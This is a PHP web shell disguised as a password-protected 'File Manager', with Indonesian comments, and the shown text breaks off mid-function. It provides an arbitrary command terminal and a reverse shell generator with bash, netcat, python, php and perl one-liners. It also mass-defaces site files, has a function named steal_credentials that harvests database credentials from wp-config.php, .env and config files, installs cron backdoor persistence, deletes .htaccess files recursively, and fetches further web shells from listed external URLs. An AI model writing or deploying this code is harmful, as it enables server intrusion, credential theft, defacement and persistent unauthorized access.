<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

// ================== CONFIG ==================
$CONFIG_ROOT   = '/';
$PASSWORD_HASH = '$2a$12$dD.n3Zd36D.G.TZI5/tapeS882vl.8zD5O6ZTYvW0NJvkNPDzFMR2'; // ganti hash bcrypt kamu
// ============================================

define('BASE_DIR', '/');

// ======= AUTH (BCRYPT) - TANPA SESSION =======
$auth = false;
if (isset($_SERVER['PHP_AUTH_USER'])) {
    $input_pass = isset($_SERVER['PHP_AUTH_PW']) ? $_SERVER['PHP_AUTH_PW'] : '';
    if (password_verify($input_pass, $PASSWORD_HASH)) {
        $auth = true;
    }
}

if (!$auth) {
    header('WWW-Authenticate: Basic realm="File Manager"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Access denied';
    exit;
}

function cleanPath($path) {
    $path = trim($path);
    if ($path === '') $path = '/';
    if ($path[0] !== DIRECTORY_SEPARATOR) {
        $path = getcwd() . DIRECTORY_SEPARATOR . $path;
    }
    $real = realpath($path);
    if ($real === false) return getcwd();
    return $real;
}

// ======= MAIN SETUP =======
$pwd = isset($_GET['pwd']) ? cleanPath($_GET['pwd']) : getcwd();

// Handle manual path edit
if (isset($_POST['manual_pwd']) && !empty($_POST['manual_pwd'])) {
    $newPwd = cleanPath($_POST['manual_pwd']);
    if (is_dir($newPwd)) {
        $pwd = $newPwd;
        header("Location: " . $_SERVER['PHP_SELF'] . "?pwd=" . urlencode($pwd));
        exit;
    }
}

$action = isset($_POST['action']) ? $_POST['action'] : '';
$messages = [];
$editFile = isset($_GET['edit']) ? basename($_GET['edit']) : '';
$terminalOut = '';

$presets = [
    'ALFA ONI' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/obs1.txt',
    'ALFA OBS' => 'https://obeydasupreme.site/shell/obs1.txt',
    'ALFA RUDY' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/papikeng.php',
    'ALFA ANTIWAF 1' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/alfashells.txt',
    'ALFA ANTIWAF 2' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/antibadai.txt',
    'ALFA ANTIWAF 3' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/antimalware.txt',
    'ALFA ANTIWAF 4' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/antiwaf.txt',
    'LOOSER' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/looser1.txt',
    'LOOSER 2' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/looser2.txt',
    'ZONE SHELL' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/1.php',
    'FMOBS' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/OBSNEWSHELLL.txt',
    'TINY' => 'https://obeydasupreme.site/shell/obstiny.txt',
    'GECKO' => 'https://obeydasupreme.site/shell/obsgecko.txt',
    'KOD EXPLORE' => 'https://github.com/kalcaddle/KODExplorer/archive/master.zip',
    'LADEV' => 'https://obeydasupreme.site/shell/okeoce.txt',
    'SCANNER' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/scannerfilter.txt',
    'ADMINER' => 'https://raw.githubusercontent.com/yourfr13nds/backburner/main/adminer.php',
    'GSC' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/google63c1b42f5347f5ee.html',
    'GSC 2' => 'https://raw.githubusercontent.com/tuman88936/tumankan/refs/heads/main/google29ba1fdf141689ea.html',
];

// ===== INFO SERVER PANEL =====
$uname = php_uname();
$userName = function_exists('posix_getpwuid') ? (posix_getpwuid(posix_geteuid())['name'] ?? 'unknown') : 'n/a';
$groupName = function_exists('posix_getgrgid') ? (posix_getgrgid(posix_getegid())['name'] ?? 'unknown') : 'n/a';
$phpVersion = PHP_VERSION;
$serverIp = $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname());
$yourIp = $_SERVER['REMOTE_ADDR'] ?? 'CLI';
$dateTime = date('Y-m-d H:i:s');
$diskTotal = @disk_total_space('/') ?: 0;
$diskFree = @disk_free_space('/') ?: 0;
$diskTotalGB = $diskTotal ? round($diskTotal / 1024 / 1024 / 1024, 2) : 0;
$diskFreeGB = $diskFree ? round($diskFree / 1024 / 1024 / 1024, 2) : 0;
$diskFreePct = $diskTotal ? round(($diskFree / $diskTotal) * 100) : 0;
$software = $_SERVER['SERVER_SOFTWARE'] ?? 'unknown';
$curlOn = function_exists('curl_version') ? 'ON' : 'OFF';
$ssh2On = function_exists('ssh2_connect') ? 'ON' : 'OFF';
$mysqlOn = function_exists('mysqli_connect') ? 'ON' : 'OFF';
$pgOn = function_exists('pg_connect') ? 'ON' : 'OFF';

// ======= HELPERS =======
function chmod_recursive($path, $mode, &$messages) {
    if (!file_exists($path)) {
        $messages[] = "[FAIL] Target tidak ada (rekursif): $path";
        return;
    }
    if (!@chmod($path, $mode)) {
        $messages[] = "[FAIL] Gagal chmod: $path";
    } else {
        $messages[] = "[OK]   Berhasil chmod: $path";
    }
    if (is_dir($path)) {
        $items = @scandir($path);
        if ($items === false) return;
        foreach ($items as $it) {
            if ($it === '.' || $it === '..') continue;
            $child = $path . DIRECTORY_SEPARATOR . $it;
            chmod_recursive($child, $mode, $messages);
        }
    }
}

function touch_recursive($path, $ts, &$messages, $labelTime) {
    if (!file_exists($path)) {
        $messages[] = "[FAIL] Target tidak ada (rekursif): $path";
        return;
    }
    if (!@touch($path, $ts)) {
        $messages[] = "[FAIL] Gagal set waktu: $path ke $labelTime";
    } else {
        clearstatcache(true, $path);
        $messages[] = "[OK]   Berhasil set waktu: $path ke $labelTime";
    }
    if (is_dir($path)) {
        $items = @scandir($path);
        if ($items === false) return;
        foreach ($items as $it) {
            if ($it === '.' || $it === '..') continue;
            $child = $path . DIRECTORY_SEPARATOR . $it;
            touch_recursive($child, $ts, $messages, $labelTime);
        }
    }
}

function create_in_dirs_recursive($baseDirs, $name, $isFile, $content, &$messages) {
    foreach ($baseDirs as $dirPath) {
        $dirPath = cleanPath($dirPath);
        if (!is_dir($dirPath)) {
            $messages[] = "[FAIL] Dir target tidak ada: $dirPath";
            continue;
        }
        $stack = [$dirPath];
        while ($stack) {
            $cur = array_pop($stack);
            if (!is_dir($cur)) continue;
            $dest = rtrim($cur, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;
            if ($isFile) {
                if (file_exists($dest)) {
                    $messages[] = "[SKIP] File sudah ada: $dest";
                } else {
                    if (file_put_contents($dest, $content) === false) {
                        $messages[] = "[FAIL] Gagal buat file: $dest";
                    } else {
                        $messages[] = "[OK]   File dibuat: $dest";
                    }
                }
            } else {
                if (is_dir($dest) || file_exists($dest)) {
                    $messages[] = "[SKIP] Folder/file sudah ada: $dest";
                } else {
                    if (!@mkdir($dest, 0775, false)) {
                        $messages[] = "[FAIL] Gagal buat folder: $dest";
                    } else {
                        $messages[] = "[OK]   Folder dibuat: $dest";
                    }
                }
            }
            $items = @scandir($cur);
            if ($items === false) continue;
            foreach ($items as $it) {
                if ($it === '.' || $it === '..') continue;
                $child = $cur . DIRECTORY_SEPARATOR . $it;
                if (is_dir($child)) $stack[] = $child;
            }
        }
    }
}

function destroy_dir($dir) {
    if (!is_dir($dir) || is_link($dir)) return @unlink($dir);
    foreach (scandir($dir) as $file) {
        if ($file == '.' || $file == '..') continue;
        if (!destroy_dir($dir . DIRECTORY_SEPARATOR . $file)) {
            @chmod($dir . DIRECTORY_SEPARATOR . $file, 0777);
            if (!destroy_dir($dir . DIRECTORY_SEPARATOR . $file)) return false;
        }}
    return @rmdir($dir);
}

function zip_paths($paths, $zipFile, &$messages) {
    if (!class_exists('ZipArchive')) {
        $messages[] = "[FAIL] ZipArchive tidak tersedia di server.";
        return false;
    }
    $zip = new ZipArchive();
    if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        $messages[] = "[FAIL] Tidak bisa membuat ZIP: $zipFile";
        return false;
    }
    foreach ($paths as $p) {
        if (is_dir($p)) {
            $base = basename($p);
            $it = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($p, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            foreach ($it as $file) {
                $relPath = $base . '/' . substr($file->getPathname(), strlen($p) + 1);
                if ($file->isDir()) {
                    $zip->addEmptyDir($relPath);
                } else {
                    $zip->addFile($file->getPathname(), $relPath);
                }
            }
        } elseif (is_file($p)) {
            $zip->addFile($p, basename($p));
        }
    }
    $zip->close();
    return true;
}

function send_download($path, $downloadName = null) {
    if (!file_exists($path)) return false;
    if ($downloadName === null) $downloadName = basename($path);
    if (ob_get_length()) @ob_end_clean();
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $downloadName . '"');
    header('Content-Length: ' . filesize($path));
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    readfile($path);
    return true;
}

// ========== FITUR BARU ==========

// 1. REVERSE SHELL GENERATOR
function generate_reverse_shell($ip, $port, $type) {
    $shells = [
        'bash' => "bash -i >& /dev/tcp/$ip/$port 0>&1",
        'nc' => "nc -e /bin/sh $ip $port",
        'nc2' => "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f",
        'python' => "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
        'php' => "php -r '\$sock=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
        'perl' => "perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
    ];
    return isset($shells[$type]) ? $shells[$type] : "Type tidak valid";
}

// 2. MASS DEFACER
function mass_deface($dir, $message, $extensions, &$messages) {
    $count = 0;
    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS));
    foreach ($iterator as $file) {
        if ($file->isFile()) {
            $ext = pathinfo($file->getFilename(), PATHINFO_EXTENSION);
            if (in_array($ext, $extensions)) {
                $content = file_get_contents($file->getPathname());
                $newContent = "<!-- DEFACED -->\n" . $message . "\n<!-- END DEFACED -->\n" . $content;
                if (file_put_contents($file->getPathname(), $newContent)) {
                    $count++;
                }
            }
        }
    }
    $messages[] = "[OK] Berhasil deface $count file";
}

function steal_credentials($dir, &$messages) {
    $patterns = [
        'wp-config.php' => '/define\(\s*[\'"]DB_(NAME|USER|PASSWORD|HOST)[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)/i',
        'config.php' => '/\$db_(host|user|pass|name)\s*=\s*[\'"]([^\'"]+)[\'"]/i',
        '.env' => '/(DB_|MYSQL_|POSTGRES_|REDIS_)([A-Z_]+)\s*=\s*([^\s]+)/',
        'database.php' => '/(hostname|username|password|database)\s*=\s*[\'"]([^\'"]+)[\'"]/i',
        'config.inc.php' => '/\$cfg\[\'(\w+)\'\]\s*=\s*[\'"]([^\'"]+)[\'"]/i',
    ];
    
    // Format INI/KEY-VALUE (buat file .ini, .conf, config, dll)
    $iniPatterns = [
        '/(?:host|server)\s*=\s*"?([^"\n]+)"?/i',
        '/(?:user|username)\s*=\s*"?([^"\n]+)"?/i',
        '/(?:pass|password)\s*=\s*"?([^"\n]+)"?/i',
        '/(?:db|database|dbname|name)\s*=\s*"?([^"\n]+)"?/i',
    ];
    
    $found = [];
    
    // Scan file dengan pattern spesifik
    foreach ($patterns as $filename => $pattern) {
        if (is_dir($dir)) {
            $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS));
            foreach ($iterator as $file) {
                if ($file->getFilename() === $filename && $file->isReadable()) {
                    $content = file_get_contents($file->getPathname());
                    preg_match_all($pattern, $content, $matches);
                    if (!empty($matches[0])) {
                        $found[] = "📁 File: " . $file->getPathname();
                        foreach ($matches[0] as $match) {
                            $found[] = "   🔑 " . htmlspecialchars(trim($match));
                        }
                        $found[] = "---";
                    }
                }
            }
        }
    }
    
    // Scan file dengan format INI (config, .ini, .conf, settings)
    $iniFiles = [];
    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS));
    foreach ($iterator as $file) {
        $ext = strtolower(pathinfo($file->getFilename(), PATHINFO_EXTENSION));
        $name = $file->getFilename();
        // Target file yang mungkin berisi config
        if (in_array($ext, ['ini', 'conf', 'cfg']) || 
            in_array($name, ['config', 'settings', 'database', 'db', 'my.cnf', '.my.cnf']) ||
            preg_match('/\.(conf|ini|cfg)$/i', $name)) {
            $iniFiles[] = $file;
        }
    }
    
    foreach ($iniFiles as $file) {
        if ($file->isReadable()) {
            $content = file_get_contents($file->getPathname());
            $foundCreds = [];
            
            foreach ($iniPatterns as $pattern) {
                preg_match_all($pattern, $content, $matches);
                if (!empty($matches[1])) {
                    foreach ($matches[1] as $match) {
                        $match = trim($match, '"\'');
                        if (!empty($match) && $match != 'localhost' && strlen($match) > 1) {
                            $foundCreds[] = $match;
                        }
                    }
                }
            }
            
            // Cek juga untuk [database] section
            if (preg_match('/\[database\]\s*(.*?)(?=\[|$)/is', $content, $section)) {
                $found[] = "📁 File: " . $file->getPathname() . " [database] section";
                foreach ($iniPatterns as $pattern) {
                    preg_match_all($pattern, $section[1], $matches);
                    if (!empty($matches[1])) {
                        foreach ($matches[1] as $match) {
                            $match = trim($match, '"\'');
                            if (!empty($match)) {
                                $found[] = "   🔑 " . htmlspecialchars($match);
                            }
                        }
                    }
                }
                $found[] = "---";
            }
            
            // Jika ada credentials ditemukan
            if (!empty($foundCreds) && !preg_match('/\[database\]/is', $content)) {
                $found[] = "📁 File: " . $file->getPathname();
                // Tampilkan isi file yang relevan
                $lines = explode("\n", $content);
                foreach ($lines as $line) {
                    if (preg_match('/(host|server|user|username|pass|password|db|database|name)\s*=/i', $line)) {
                        $found[] = "   📄 " . htmlspecialchars(trim($line));}
                }
                $found[] = "---";
            }
        }
    }
    
    return $found;
}

// 4. BACKDOOR PERSISTENCE (CRON JOB)
function install_persistence($backdoor_path, &$messages) {
    $cron_cmd = "* * * * * php -r 'file_get_contents(\"http://\" . \$_SERVER[\"SERVER_NAME\"] . \"/$backdoor_path\");' >/dev/null 2>&1";
    $cron_file = sys_get_temp_dir() . '/cron_' . md5(rand());
    file_put_contents($cron_file, $cron_cmd . "\n");
    $output = shell_exec("crontab $cron_file 2>&1");
    if ($output === null) {
        $messages[] = "[FAIL] Gagal install cron job (mungkin tidak punya akses)";
    } else {
        $messages[] = "[OK] Cron job terinstall!";
    }
    @unlink($cron_file);
}

// 5. MASS FIND & REPLACE
function mass_find_replace($dir, $search, $replace, $extensions, &$messages) {
    $count = 0;
    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS));
    foreach ($iterator as $file) {
        if ($file->isFile()) {
            $ext = pathinfo($file->getFilename(), PATHINFO_EXTENSION);
            if (empty($extensions) || in_array($ext, $extensions)) {
                $content = file_get_contents($file->getPathname());
                if (strpos($content, $search) !== false) {
                    $newContent = str_replace($search, $replace, $content);
                    if (file_put_contents($file->getPathname(), $newContent)) {
                        $count++;
                    }
                }
            }
        }
    }
    $messages[] = "[OK] Berhasil find & replace di $count file";
}

function delete_htaccess_recursive($dir, &$messages) {
    $items = @scandir($dir);
    if ($items === false) return;
    
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        
        if (is_dir($path)) {
            delete_htaccess_recursive($path, $messages);
        } elseif ($item === '.htaccess') {
            if (@unlink($path)) {
                $messages[] = "[OK] Berhasil hapus .htaccess: $path";
            } else {
                $messages[] = "[FAIL] Gagal hapus .htaccess: $path";
            }
        }
    }
}

// ================== HANDLE POST ==================
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $pwd = isset($_GET['pwd']) ? cleanPath($_GET['pwd']) : getcwd();
    $action = isset($_POST['action']) ? $_POST['action'] : '';

    if ($action === 'terminal_exec') {
        $cmd = isset($_POST['terminal_cmd']) ? trim($_POST['terminal_cmd']) : '';
        if ($cmd === '') {
            $messages[] = "Perintah terminal kosong.";
        } else {
            $fullCmd = 'cd ' . escapeshellarg($pwd) . ' && ' . $cmd . ' 2>&1';
            $output = @shell_exec($fullCmd);
            if ($output === null) {
                $messages[] = "[FAIL] shell_exec diblokir di server.";
            } else {
                $terminalOut = $output;
            }
        }
    } elseif ($action === 'delete_selected') {
        $fileTargets = $_POST['file_targets'] ?? [];
        $dirTargets = $_POST['dir_targets'] ?? [];
        
        if (empty($fileTargets) && empty($dirTargets)) {
            $messages[] = "Pilih minimal satu file/folder untuk dihapus.";
        } else {
            foreach ($fileTargets as $f) {
                $path = $pwd . DIRECTORY_SEPARATOR . basename($f);
                if (file_exists($path) && is_file($path)) {
                    if (@unlink($path)) {
                        $messages[] = "[OK] Berhasil hapus file: $path";
                    } else {
                        $messages[] = "[FAIL] Gagal hapus file: $path";
                    }
                }
            }
            foreach ($dirTargets as $d) {
                $path = cleanPath($d);
                if (is_dir($path)) {
                    if (destroy_dir($path)) {
                        $messages[] = "[OK] Berhasil hapus folder: $path";
                    } else {
                        $messages[] = "[FAIL] Gagal hapus folder: $path";
                    }
                }
            }
        }
    } elseif ($action === 'delete_htaccess') {
        $mode = $_POST['htaccess_mode'] ?? 'current';
        if ($mode === 'current') {
            $files = scandir($pwd);
            if ($files !== false) {
                foreach ($files as $file) {
                    if ($file === '.htaccess') {
                        $path = $pwd . DIRECTORY_SEPARATOR . $file;
                        if (@unlink($path)) {
                            $messages[] = "[OK] Berhasil hapus .htaccess: $path";
                        } else {
                            $messages[] = "[FAIL] Gagal hapus .htaccess: $path";
                        }
                    }
                }
            }
        } elseif ($mode === 'recursive') {
            delete_htaccess_recursive($pwd, $messages);
        }
    } elseif ($action === 'generate_reverse_shell') {
        $ip = $_POST['rev_ip'] ?? '';
        $port = intval($_POST['rev_port'] ?? 0);
        $type = $_POST['rev_type'] ?? 'bash';
        if ($ip && $port) {
            $shell = generate_reverse_shell($ip, $port, $type);
            $messages[] = "<strong>Reverse Shell Command:</strong><br><code style='background:#000;padding:10px;display:block;margin-top:5px;'>$shell</code>";
        } else {
            $messages[] = "Isi IP dan Port!";
        }
    } elseif ($action === 'mass_deface') {
        $message = $_POST['deface_message'] ?? '';
        $extensions = explode(',', $_POST['deface_extensions'] ?? 'php,html,htm');
        if ($message) {
            mass_deface($pwd, $message, $extensions, $messages);
        } else {
            $messages[] = "Isi pesan deface!";
        }
    } elseif ($action === 'steal_credentials') {
        $creds = steal_credentials($pwd, $messages);
        if (empty($creds)) {
            $messages[] = "Tidak ditemukan credentials.";
        } else {
            $messages[] = "<strong>Credentials Found:</strong><br><pre style='background:#000;padding:10px;overflow:auto;'>" . htmlspecialchars(implode("\n", $creds)) . "</pre>";
        }
    } elseif ($action === 'install_persistence') {
        $backdoor_path = $_POST['backdoor_path'] ?? basename($_SERVER['PHP_SELF']);
        install_persistence($backdoor_path, $messages);
    } elseif ($action === 'mass_find_replace') {
        $search = $_POST['fr_search'] ?? '';
        $replace = $_POST['fr_replace'] ?? '';
        $extensions = explode(',', $_POST['fr_extensions'] ?? '');
        if ($search && $replace) {
            mass_find_replace($pwd, $search, $replace, $extensions, $messages);
        } else {
            $messages[] = "Isi search dan replace!";
        }
    } else {

        if ($action === 'create_file_flat') {
            $rawName = $_POST['new_file_name'] ?? '';
            $name = basename(trim($rawName));
            $content = $_POST['new_file_content'] ?? '';
            if ($name === '') {
                $messages[] = "Nama file baru wajib diisi.";
            } else {
                $dirs = $_POST['dir_targets'] ?? [];
                if ($dirs) {
                    foreach ($dirs as $dirPath) {
                        $dirPath = cleanPath($dirPath);
                        if (!is_dir($dirPath)) {
                            $messages[] = "[FAIL] Dir target tidak ada: $dirPath";
                            continue;
                        }
                        $dest = rtrim($dirPath, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;
                        if (file_exists($dest)) {
                            $messages[] = "[FAIL] File sudah ada: $dest";
                            continue;
                        }
                        if (file_put_contents($dest, $content) === false) {
                            $messages[] = "[FAIL] Gagal membuat file di $dest";} else {
                            $messages[] = "[OK]   Berhasil membuat file di $dest";
                        }
                    }
                } else {
                    $dest = $pwd . DIRECTORY_SEPARATOR . $name;
                    if (file_exists($dest)) {
                        $messages[] = "[FAIL] File sudah ada: $dest";
                    } else {
                        if (file_put_contents($dest, $content) === false) {
                            $messages[] = "[FAIL] Gagal membuat file: $dest";
                        } else {
                            $messages[] = "[OK]   Berhasil membuat file: $dest";
                        }
                    }
                }
            }
        }

        if ($action === 'create_file_recursive') {
            $rawName = $_POST['new_file_name'] ?? '';
            $name = basename(trim($rawName));
            $content = $_POST['new_file_content'] ?? '';
            $dirs = $_POST['dir_targets'] ?? [];
            if ($name === '') {
                $messages[] = "Nama file baru wajib diisi.";
            } elseif (!$dirs) {
                $messages[] = "Centang minimal satu folder untuk create file recursive.";
            } else {
                create_in_dirs_recursive($dirs, $name, true, $content, $messages);
            }
        }

        if ($action === 'create_folder_flat') {
            $rawName = $_POST['new_folder_name'] ?? '';
            $name = basename(trim($rawName));
            if ($name === '') {
                $messages[] = "Nama folder baru wajib diisi.";
            } else {
                $dirs = $_POST['dir_targets'] ?? [];
                if ($dirs) {
                    foreach ($dirs as $dirPath) {
                        $dirPath = cleanPath($dirPath);
                        if (!is_dir($dirPath)) {
                            $messages[] = "[FAIL] Dir target tidak ada: $dirPath";
                            continue;
                        }
                        $dest = rtrim($dirPath, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;
                        if (is_dir($dest) || file_exists($dest)) {
                            $messages[] = "[FAIL] Folder/file sudah ada: $dest";
                            continue;
                        }
                        if (!@mkdir($dest, 0775, false)) {
                            $messages[] = "[FAIL] Gagal membuat folder: $dest";
                        } else {
                            $messages[] = "[OK]   Berhasil membuat folder: $dest";
                        }
                    }
                } else {
                    $dest = $pwd . DIRECTORY_SEPARATOR . $name;
                    if (is_dir($dest) || file_exists($dest)) {
                        $messages[] = "[FAIL] Folder/file sudah ada: $dest";
                    } else {
                        if (!@mkdir($dest, 0775, false)) {
                            $messages[] = "[FAIL] Gagal membuat folder: $dest";
                        } else {
                            $messages[] = "[OK]   Berhasil membuat folder: $dest";
                        }
                    }
                }
            }
        }

        if ($action === 'create_folder_recursive') {
            $rawName = $_POST['new_folder_name'] ?? '';
            $name = basename(trim($rawName));
            $dirs = $_POST['dir_targets'] ?? [];
            if ($name === '') {
                $messages[] = "Nama folder baru wajib diisi.";
            } elseif (!$dirs) {
                $messages[] = "Centang minimal satu folder untuk create folder recursive.";
            } else {
                create_in_dirs_recursive($dirs, $name, false, '', $messages);
            }
        }

        if ($action === 'rename_save_mass') {
            $fileTargets = $_POST['file_targets'] ?? [];
            $renameVals = $_POST['rename_val'] ?? [];
            if (!$fileTargets) {
                $messages[] = "Pilih minimal satu file untuk rename.";
            } else {
                foreach ($fileTargets as $oldRaw) {
                    $old = basename($oldRaw);
                    $new = isset($renameVals[$old]) ? trim($renameVals[$old]) : '';
                    if ($new === '') {
                        $messages[] = "Nama baru kosong untuk $old.";
                        continue;
                    }
                    $from = $pwd . DIRECTORY_SEPARATOR . $old;
                    if (!is_file($from)) {
                        $messages[] = "[FAIL] File tidak ada: $from";
                        continue;
                    }
                    $to = $pwd . DIRECTORY_SEPARATOR . basename($new);
                    if (!@rename($from, $to)) {
                        $messages[] = "[FAIL] Gagal rename $from -> $to";
                    } else {
                        $messages[] = "[OK]   Berhasil rename $from -> $to";
                    }
                }
            }
        }

        if (strpos($action, 'delete_one:') === 0) {
            $name = basename(substr($action, strlen('delete_one:')));
            $path = $pwd . DIRECTORY_SEPARATOR . $name;
            if (!is_file($path)) {
                $messages[] = "[FAIL] File tidak ada: $path";
            } elseif (!@unlink($path)) {
                $messages[] = "[FAIL] Gagal hapus file: $path";
            } else {
                $messages[] = "[OK]   Berhasil hapus file: $path";
            }
        }

        if (strpos($action, 'delete_dir_one:') === 0) {
            $dirPath = substr($action, strlen('delete_dir_one:'));
            $dirPath = cleanPath($dirPath);
            if (!is_dir($dirPath)) {
                $messages[] = "[FAIL] Folder tidak ada: $dirPath";
            } else {
                if (!destroy_dir($dirPath)) {
                    $messages[] = "[FAIL] Gagal hapus folder: $dirPath";
                } else {
                    $messages[] = "[OK]   Berhasil hapus folder: $dirPath";
                }
            }
        }

        if (strpos($action, 'rename_dir_one:') === 0) {
            $payload = substr($action, strlen('rename_dir_one:'));
            $parts = explode('|', $payload, 2);
            if (count($parts) !== 2) {
                $messages[] = "[FAIL] Data rename folder tidak valid.";
            } else {
                $oldPath = cleanPath($parts[0]);
                $newName = trim($parts[1]);
                if ($newName === '') {
                    $messages[] = "[FAIL] Nama folder baru kosong.";
                } elseif (!is_dir($oldPath)) {
                    $messages[] = "[FAIL] Folder tidak ada: $oldPath";
                } else {
                    $parentDir = dirname($oldPath);
                    $newPath = $parentDir . DIRECTORY_SEPARATOR . basename($newName);
                    if (file_exists($newPath)) {
                        $messages[] = "[FAIL] Target sudah ada: $newPath";
                    } elseif (!@rename($oldPath, $newPath)) {
                        $messages[] = "[FAIL] Gagal rename folder: $oldPath -> $newPath";
                    } else {
                        $messages[] = "[OK]   Berhasil rename folder: $oldPath -> $newPath";
                    }
                }
            }
        }

        if ($action === 'edit_save') {
            $fileName = basename($_POST['edit_file'] ?? '');
            $content = $_POST['file_content'] ?? '';
            if ($fileName === '') {
                $messages[] = "Nama file untuk edit kosong.";
            } else {
                $path = $pwd . DIRECTORY_SEPARATOR . $fileName;
                if (!is_file($path)) {
                    $messages[] = "[FAIL] File tidak ada: $path";
                } elseif (!is_writable($path)) {
                    $messages[] = "[FAIL] File tidak bisa ditulis: $path";
                } elseif (file_put_contents($path, $content) === false) {
                    $messages[] = "[FAIL] Gagal menyimpan isi file: $path";
                }else {
                    $messages[] = "[OK]   Berhasil menyimpan file: $path";
                }
            }
        }

        if ($action === 'deploy_url') {
            $url = trim($_POST['src_url'] ?? '');
            $rawTarget = $_POST['target_name_url'] ?? '';
            $targetName = basename(trim($rawTarget));
            if ($url === '' || $targetName === '') {
                $messages[] = "URL dan nama file tujuan wajib diisi.";
            } elseif (!preg_match('#^https?://#i', $url)) {
                $messages[] = "URL harus dimulai dengan http:// atau https://";
            } else {
                $data = @file_get_contents($url);
                if ($data === false) {
                    $messages[] = "Gagal download dari URL.";
                } else {
                    $dirs = $_POST['dir_targets'] ?? [];
                    if ($dirs) {
                        foreach ($dirs as $dirPath) {
                            $dirPath = cleanPath($dirPath);
                            if (!is_dir($dirPath)) {
                                $messages[] = "[FAIL] Dir target tidak ada: $dirPath";
                                continue;
                            }
                            $dest = rtrim($dirPath, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $targetName;
                            if (file_put_contents($dest, $data) === false) {
                                $messages[] = "[FAIL] Gagal simpan ke $dest";
                            } else {
                                $messages[] = "[OK]   Berhasil download ke $dest";
                            }
                        }
                    } else {
                        $dest = $pwd . DIRECTORY_SEPARATOR . $targetName;
                        if (is_dir($dest)) {
                            $messages[] = "[FAIL] Tujuan adalah direktori, bukan file: $dest";
                        } elseif (file_put_contents($dest, $data) === false) {
                            $messages[] = "[FAIL] Gagal simpan ke $dest";
                        } else {
                            $messages[] = "[OK]   Berhasil download ke $dest";
                        }
                    }
                }
            }
        }

        if ($action === 'deploy_upload') {
            $rawTarget = $_POST['target_name_upload'] ?? '';
            $targetName = basename(trim($rawTarget));
            if (!isset($_FILES['src_file']) || $_FILES['src_file']['error'] !== UPLOAD_ERR_OK) {
                $messages[] = "Upload gagal atau tidak ada file.";
            } elseif ($targetName === '') {
                $messages[] = "Nama file tujuan wajib diisi.";
            } else {
                $tmp = $_FILES['src_file']['tmp_name'];
                $dirs = $_POST['dir_targets'] ?? [];
                if ($dirs) {
                    foreach ($dirs as $dirPath) {
                        $dirPath = cleanPath($dirPath);
                        if (!is_dir($dirPath)) {
                            $messages[] = "[FAIL] Dir target tidak ada: $dirPath";
                            continue;
                        }
                        $dest = rtrim($dirPath, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $targetName;
                        if (!@copy($tmp, $dest)) {
                            $messages[] = "[FAIL] Gagal copy upload ke $dest";
                        } else {
                            $messages[] = "[OK]   Berhasil upload ke $dest";
                        }
                    }
                } else {
                    $dest = $pwd . DIRECTORY_SEPARATOR . $targetName;
                    if (is_dir($dest)) {
                        $messages[] = "[FAIL] Tujuan adalah direktori, bukan file: $dest";
                    } else {
                        if (!@move_uploaded_file($tmp, $dest)) {
                            if (!@copy($tmp, $dest)) {
                                $messages[] = "[FAIL] Gagal simpan upload ke $dest";
                            } else {
                                $messages[] = "[OK]   Berhasil upload ke $dest (via copy)";
                            }
                        } else {
                            $messages[] = "[OK]   Berhasil uploadke $dest";
                        }
                    }
                }
            }
        }

        if ($action === 'chmod_apply_flat') {
            $fileTargets = $_POST['file_targets'] ?? [];
            $dirTargets = $_POST['dir_targets'] ?? [];
            $modeStr = trim($_POST['chmod_mode'] ?? '');
            if ((!$fileTargets && !$dirTargets) || $modeStr === '') {
